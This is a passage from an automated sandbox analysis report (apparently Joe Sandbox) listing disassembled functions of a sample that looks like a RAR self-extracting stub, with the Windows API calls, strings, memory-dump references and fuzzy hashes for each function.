                • Part of subcall function 00B917AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00B8BB05,00000000,.exe,?,?,00000800,?,?,00B985DF,?), ref: 00B917C2
              • _swprintf.LIBCMT ref: 00B89526
                • Part of subcall function 00B8400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B8401D
              • MoveFileW.KERNEL32(?,?), ref: 00B89595
              • MoveFileW.KERNEL32(?,?), ref: 00B895D5
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
              • String ID: rtmp%d
              • API String ID: 2111052971-3303766350
              • Opcode ID: cba0bfc8d731d286888c70ace8cf9e5b952a1d4715d5486aa4c152cc69225436
              • Instruction ID: 94eb1d21105605ad75466d7d246847c91636ec1bc1e0eace371d129cc5b84c7d
              • Opcode Fuzzy Hash: cba0bfc8d731d286888c70ace8cf9e5b952a1d4715d5486aa4c152cc69225436
              • Instruction Fuzzy Hash: E2412C71900259A6DF20FBA08C85EEA73FCEF15780F0844E5B559A3062EB749B89DB64
              Function 00B98E62 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 125memoryCOMMON
              Download Yara Rule
              APIs
              • GlobalAlloc.KERNEL32(00000040,?), ref: 00B98F38
              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00B98F59
              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 00B98F80
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: Global$AllocByteCharCreateMultiStreamWide
              • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
              • API String ID: 4094277203-4209811716
              • Opcode ID: cd3d9546945bce8b78b670d339cc712b86d85eaadb31800a15e759a9018228ad
              • Instruction ID: 5df4043ab67fbf2bd188c773e7fa36a9a4faca70c8fabd64943c56289baac0b4
              • Opcode Fuzzy Hash: cd3d9546945bce8b78b670d339cc712b86d85eaadb31800a15e759a9018228ad
              • Instruction Fuzzy Hash: 9631263254C3156BDB24AB249C02FAF77E8EF53720F1005A9F801A62D2EF749A0983A1
              Function 00B90A8A Relevance: 12.1, APIs: 8, Instructions: 115timeCOMMON
              Download Yara Rule
              APIs
              • __aulldiv.LIBCMT ref: 00B90A9D
                • Part of subcall function 00B8ACF5: GetVersionExW.KERNEL32(?), ref: 00B8AD1A
              • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00B90AC0
              • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00B90AD2
              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00B90AE3
              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B90AF3
              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B90B03
              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B90B3D
              • __aullrem.LIBCMT ref: 00B90BCB
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
              • String ID:
              • API String ID: 1247370737-0
              • Opcode ID: 607abf18d74de4530c5bdabf5d2afb06532200398732333833bd70460cf28842
              • Instruction ID: 416f0f92f44d2d00a6e1c1e6fb301fdcc55c9aa78bd2650e7e7cd6c1f43ae1f2
              • Opcode Fuzzy Hash: 607abf18d74de4530c5bdabf5d2afb06532200398732333833bd70460cf28842
              • Instruction Fuzzy Hash: 3D413AB24083069FC710EF64C88096BFBF8FF88714F404A2EF59692650E779E548CB52
              Function 00BAEE2D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
              Download Yara Rule
              APIs
              • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00BAF5A2,?,00000000,?,00000000,00000000), ref: 00BAEE6F
              • __fassign.LIBCMT ref: 00BAEEEA
              • __fassign.LIBCMT ref: 00BAEF05
              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00BAEF2B
              • WriteFile.KERNEL32(?,?,00000000,00BAF5A2,00000000,?,?,?,?,?,?,?,?,?,00BAF5A2,?), ref: 00BAEF4A
              • WriteFile.KERNEL32(?,?,00000001,00BAF5A2,00000000,?,?,?,?,?,?,?,?,?,00BAF5A2,?), ref: 00BAEF83
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
              • String ID:
              • API String ID: 1324828854-0
              • Opcode ID: dd20d31ae4a79c18b770c375e49e847c67cf1eb07d531bca0590326339629a4d
              • Instruction ID: 3f13b54361b2809fd40d4f4a1a1d92a9c6e37abfcfba5d8d382ef6aaf3d79ef7
              • Opcode Fuzzy Hash: dd20d31ae4a79c18b770c375e49e847c67cf1eb07d531bca0590326339629a4d
              • Instruction Fuzzy Hash: DD51F470A042489FDB10CFA8DC81AEEBBF9EF4A300F24455AE561E7291E771E940CB60
              Function 00B9C534 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON
              Download Yara Rule
              APIs
              • GetTempPathW.KERNEL32(00000800,?), ref: 00B9C54A
              • _swprintf.LIBCMT ref: 00B9C57E
                • Part of subcall function 00B8400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B8401D
              • SetDlgItemTextW.USER32(?,00000066,00BC946A), ref: 00B9C59E
              • _wcschr.LIBVCRUNTIME ref: 00B9C5D1
              • EndDialog.USER32(?,00000001), ref: 00B9C6B2
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
              • String ID: %s%s%u
              • API String ID: 2892007947-1360425832
              • Opcode ID: 5d56e9ceec237e976dcc535b6055d4684c6ae5a565154513603c29495d4016d9
              • Instruction ID: d54e9c5adfee7f1075498b2a8694cb017a34646ba9220ef73043a31af52ff310
              • Opcode Fuzzy Hash: 5d56e9ceec237e976dcc535b6055d4684c6ae5a565154513603c29495d4016d9
              • Instruction Fuzzy Hash: AD417C71900658AADF26EBA0DC85EEA7BFCEB18705F0040F6E509E7161EB759BC4CB50
              Function 00B99635 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108COMMON
              Download Yara Rule
              APIs
              • ShowWindow.USER32(?,00000000), ref: 00B9964E
              • GetWindowRect.USER32(?,00000000), ref: 00B99693
              • ShowWindow.USER32(?,00000005,00000000), ref: 00B9972A
              • SetWindowTextW.USER32(?,00000000), ref: 00B99732
              • ShowWindow.USER32(00000000,00000005), ref: 00B99748
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: Window$Show$RectText
              • String ID: RarHtmlClassName
              • API String ID: 3937224194-1658105358
              • Opcode ID: 85fbb9191d4be6f9b2f56ca125d11b06ae48f996c8ec9b938f2b31c6dddc3c59
              • Instruction ID: 8015c1dff74210b9e35f7ca5ed46cf7fee697289d862a2fa9c19723ddb51f590
              • Opcode Fuzzy Hash: 85fbb9191d4be6f9b2f56ca125d11b06ae48f996c8ec9b938f2b31c6dddc3c59
              • Instruction Fuzzy Hash: 2F31AE31404204EFCB519FA8DC89B6B7BECEF48701F0445ADFA49AA162CF34DA45CB62
              Function 00BABFB5 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
              Download Yara Rule
              APIs
                • Part of subcall function 00BABF79: _free.LIBCMT ref: 00BABFA2
              • _free.LIBCMT ref: 00BAC003
                • Part of subcall function 00BA84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00BABFA7,00BB3958,00000000,00BB3958,00000000,?,00BABFCE,00BB3958,00000007,00BB3958,?,00BAC3CB,00BB3958), ref: 00BA84F4
                • Part of subcall function 00BA84DE: GetLastError.KERNEL32(00BB3958,?,00BABFA7,00BB3958,00000000,00BB3958,00000000,?,00BABFCE,00BB3958,00000007,00BB3958,?,00BAC3CB,00BB3958,00BB3958), ref: 00BA8506
              • _free.LIBCMT ref: 00BAC00E
              • _free.LIBCMT ref: 00BAC019
              • _free.LIBCMT ref: 00BAC06D
              • _free.LIBCMT ref: 00BAC078
              • _free.LIBCMT ref: 00BAC083
              • _free.LIBCMT ref: 00BAC08E
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
              • Instruction ID: 4fcc351e90ea1ab050f40d5211698c3fde4821716cf46bcbae1cc61e9beb99e3
              • Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
              • Instruction Fuzzy Hash: 9611D071548B04FEE620BBB0CC47FCBB7DD6F06700F448895B2A966953DF66F9448A90
              Function 00BA20CA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetLastError.KERNEL32(?,?,00BA20C1,00B9FB12), ref: 00BA20D8
              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00BA20E6
              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BA20FF
              • SetLastError.KERNEL32(00000000,?,00BA20C1,00B9FB12), ref: 00BA2151
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: ErrorLastValue___vcrt_
              • String ID:
              • API String ID: 3852720340-0
              • Opcode ID: 5cc471f054499336449d8d0879ccb395d5c3ca4848ecc6979e68e4647e093f64
              • Instruction ID: 01df3c7855dd0027d4c18be876bc2d496a3a72a55b053a5dd776a1eb86e35cf5
              • Opcode Fuzzy Hash: 5cc471f054499336449d8d0879ccb395d5c3ca4848ecc6979e68e4647e093f64
              • Instruction Fuzzy Hash: EB01A73260D3116FBB642BB9FC8566A2BC8EB23B7572107AAF631661F1EF918C019144
              Function 00B9DC9A Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID:
              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
              • API String ID: 0-1718035505
              • Opcode ID: 3fdf0138efe40850e77e75708ea4d157c7ff1f759875ba4eee92f8e81cf8050f
              • Instruction ID: 647251508a70d673f30a57bfa23c004ee8d9b1c82081141010a48e7a8144b5c8
              • Opcode Fuzzy Hash: 3fdf0138efe40850e77e75708ea4d157c7ff1f759875ba4eee92f8e81cf8050f
              • Instruction Fuzzy Hash: 8501AF716516225B4F706FBB9CC57E623E8EE427163304AFAE502D7350EEE1C881D6A1
              Function 00B90CBE Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON
              Download Yara Rule
              APIs
              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B90D0D
                • Part of subcall function 00B8ACF5: GetVersionExW.KERNEL32(?), ref: 00B8AD1A
              • LocalFileTimeToFileTime.KERNEL32(?,00B90CB8), ref: 00B90D31
              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B90D47
              • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00B90D56
              • SystemTimeToFileTime.KERNEL32(?,00B90CB8), ref: 00B90D64
              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B90D72
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: Time$File$System$Local$SpecificVersion
              • String ID:
              • API String ID: 2092733347-0
              • Opcode ID: 76a5eb0e9be2e40aaecdd58e523c8e0d4030324db136d1f2576835e4fc8c94a2
              • Instruction ID: 8e13d99a193ac392acf1ac43135d2ed4017188d0f680ecf1ee3066d68d603d06
              • Opcode Fuzzy Hash: 76a5eb0e9be2e40aaecdd58e523c8e0d4030324db136d1f2576835e4fc8c94a2
              • Instruction Fuzzy Hash: 9C31A979910209EBCB00EFE5D8859EFBBFCFF58700B04456AE955E7210EB30A645CB65
              Function 00B991B0 Relevance: 9.1, APIs: 6, Instructions: 89COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: _memcmp
              • String ID:
              • API String ID: 2931989736-0
              • Opcode ID: bb30a5aed10e00ac2f8887f39c6fc25243da3802c4c0479a8ef2fe68e9be5c7a
              • Instruction ID: ffa79292f9ef363b9b0def0844a3187185b4e612ad383bd8772e1df8696b34c4
              • Opcode Fuzzy Hash: bb30a5aed10e00ac2f8887f39c6fc25243da3802c4c0479a8ef2fe68e9be5c7a
              • Instruction Fuzzy Hash: 81217F7160020EBBEF549B18CC81F7B77EDEF50794B2481B8FC09DA211E260ED418691
              Function 00BA8FA5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetLastError.KERNEL32(?,00BC0EE8,00BA3E14,00BC0EE8,?,?,00BA3713,00000050,?,00BC0EE8,00000200), ref: 00BA8FA9
              • _free.LIBCMT ref: 00BA8FDC
              • _free.LIBCMT ref: 00BA9004
              • SetLastError.KERNEL32(00000000,?,00BC0EE8,00000200), ref: 00BA9011
              • SetLastError.KERNEL32(00000000,?,00BC0EE8,00000200), ref: 00BA901D
              • _abort.LIBCMT ref: 00BA9023
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: ErrorLast$_free$_abort
              • String ID:
              • API String ID: 3160817290-0
              • Opcode ID: e1ea4ee86f331fb9590e87a5bb085e5e57bd6185dfbfa9d562a40b4875cdc1bd
              • Instruction ID: 9489521c970e39f06c35feeb9aaa258b55155a5c8dd4c81d6e18e5b75c8b6369
              • Opcode Fuzzy Hash: e1ea4ee86f331fb9590e87a5bb085e5e57bd6185dfbfa9d562a40b4875cdc1bd
              • Instruction Fuzzy Hash: D6F0283154C6016FC22233286C0AB2B2AEADFD3760F350696F515D3AA2EF61CD01A020
              Function 00B9D2E6 Relevance: 9.0, APIs: 6, Instructions: 43windowsynchronizationCOMMON
              Download Yara Rule
              APIs
              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00B9D2F2
              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B9D30C
              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B9D31D
              • TranslateMessage.USER32(?), ref: 00B9D327
              • DispatchMessageW.USER32(?), ref: 00B9D331
              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00B9D33C
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
              • String ID:
              • API String ID: 2148572870-0
              • Opcode ID: ca7686c0ce601c40279a4babc93c9cdbca39016d877d218a99f0cef0ed5e4ff7
              • Instruction ID: 159f2003abad04aa4e6f47c0d8efc225ad84335b9861623770fd76595a0ca0e3
              • Opcode Fuzzy Hash: ca7686c0ce601c40279a4babc93c9cdbca39016d877d218a99f0cef0ed5e4ff7
              • Instruction Fuzzy Hash: 91F03171A01119ABCF206BA1DC4CEDBBF6DEF51751F404121F506D7051DA748541C7A1
              Function 00B9C40E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
              Download Yara Rule
              APIs
              • _wcschr.LIBVCRUNTIME ref: 00B9C435
                • Part of subcall function 00B917AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00B8BB05,00000000,.exe,?,?,00000800,?,?,00B985DF,?), ref: 00B917C2
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: CompareString_wcschr
              • String ID: <$HIDE$MAX$MIN
              • API String ID: 2548945186-3358265660
              • Opcode ID: 2d18244fbc66fc3a78529630901a9322bf3867d816bb7a029cd33b4835d005a2
              • Instruction ID: 90b175374e68868b7fd4c3972cf0ddeb4db8f64ca66559051cb4dc932c136ac7
              • Opcode Fuzzy Hash: 2d18244fbc66fc3a78529630901a9322bf3867d816bb7a029cd33b4835d005a2
              • Instruction Fuzzy Hash: 86318272A00649AADF25DE94CC91EEE7BFCEB14300F0044F6FA1596291EBB49FC4CA50
              Function 00B9ADED Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59windowCOMMON
              Download Yara Rule
              APIs
              • LoadBitmapW.USER32(00000065), ref: 00B9ADFD
              • GetObjectW.GDI32(00000000,00000018,?), ref: 00B9AE22
              • DeleteObject.GDI32(00000000), ref: 00B9AE54
              • DeleteObject.GDI32(00000000), ref: 00B9AE77
                • Part of subcall function 00B99E1C: FindResourceW.KERNEL32(00B9AE4D,PNG,?,?,?,00B9AE4D,00000066), ref: 00B99E2E
                • Part of subcall function 00B99E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,00B9AE4D,00000066), ref: 00B99E46
                • Part of subcall function 00B99E1C: LoadResource.KERNEL32(00000000,?,?,?,00B9AE4D,00000066), ref: 00B99E59
                • Part of subcall function 00B99E1C: LockResource.KERNEL32(00000000,?,?,?,00B9AE4D,00000066), ref: 00B99E64
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
